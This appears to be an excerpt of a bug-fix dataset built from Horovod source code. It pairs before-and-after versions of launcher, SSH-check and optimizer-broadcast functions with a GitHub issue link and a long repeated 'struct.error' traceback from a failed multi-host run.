"horovod.run.run_task",
str(driver_ip),
str(run_func_server_port),
]
try:
_launch_job(args, settings, nics, command)
results = [None] * args.np
# TODO: make it parallel to improve performance
for i in range(args.np):
results[i] = read_data_from_kvstore(
driver_ip, run_func_server_port, "runfunc_result", str(i)
)
return results
finally:
run_func_server.shutdown_server()
else:
command = args.command
_launch_job(args, settings, nics, command)
return None
|
def _run_static(args):
all_host_names, _ = parse_hosts_and_slots(args.hosts)
nics_set = set(args.nics.split(",")) if args.nics else None
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
extra_mpi_args=args.mpi_args,
tcp_flag=args.tcp_flag,
binding_args=args.binding_args,
key=secret.make_secret_key(),
start_timeout=tmout,
num_proc=args.np,
hosts=args.hosts,
num_hosts=len(all_host_names),
output_filename=args.output_filename,
run_func_mode=args.run_func is not None,
nics=nics_set,
)
# This cache stores the results of checks performed by horovod
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
_check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
nics = driver_service.get_common_interfaces(
settings, all_host_names, remote_host_names, fn_cache
)
if args.run_func:
# get the driver IPv4 address
driver_ip = network.get_driver_ip(nics)
run_func_server = KVStoreServer(verbose=settings.verbose)
run_func_server_port = run_func_server.start_server()
put_data_into_kvstore(
driver_ip, run_func_server_port, "runfunc", "func", args.run_func
)
command = [
sys.executable,
"-m",
"horovod.run.run_task",
str(driver_ip),
str(run_func_server_port),
]
try:
_launch_job(args, settings, nics, command)
results = [None] * args.np
# TODO: make it parallel to improve performance
for i in range(args.np):
results[i] = read_data_from_kvstore(
driver_ip, run_func_server_port, "runfunc_result", str(i)
)
return results
finally:
run_func_server.shutdown_server()
else:
command = args.command
_launch_job(args, settings, nics, command)
return None
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def get_num_threads():
"""Returns the number of hardware threads."""
lscpu_cmd = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
"{host} {cmd}".format(
host=LSFUtils.get_compute_hosts()[0], cmd=LSFUtils._LSCPU_CMD
)
)
output = io.StringIO()
exit_code = safe_shell_exec.execute(lscpu_cmd, stdout=output, stderr=output)
if exit_code != 0:
raise RuntimeError(
"{cmd} failed with exit code {exit_code}".format(
cmd=lscpu_cmd, exit_code=exit_code
)
)
return int(yaml.safe_load(output.getvalue())[LSFUtils._THREAD_KEY])
|
def get_num_threads():
"""Returns the number of hardware threads."""
lscpu_cmd = "ssh -o StrictHostKeyChecking=no {host} {cmd}".format(
host=LSFUtils.get_compute_hosts()[0], cmd=LSFUtils._LSCPU_CMD
)
output = io.StringIO()
exit_code = safe_shell_exec.execute(lscpu_cmd, stdout=output, stderr=output)
if exit_code != 0:
raise RuntimeError(
"{cmd} failed with exit code {exit_code}".format(
cmd=lscpu_cmd, exit_code=exit_code
)
)
return int(yaml.safe_load(output.getvalue())[LSFUtils._THREAD_KEY])
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
if p.requires_grad and id(p) not in state_dict["state"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
if pid not in state_dict["state"]:
# The param has not set requires_grad, so skip broadcast
continue
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
if p.requires_grad and id(p) not in state_dict["state"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
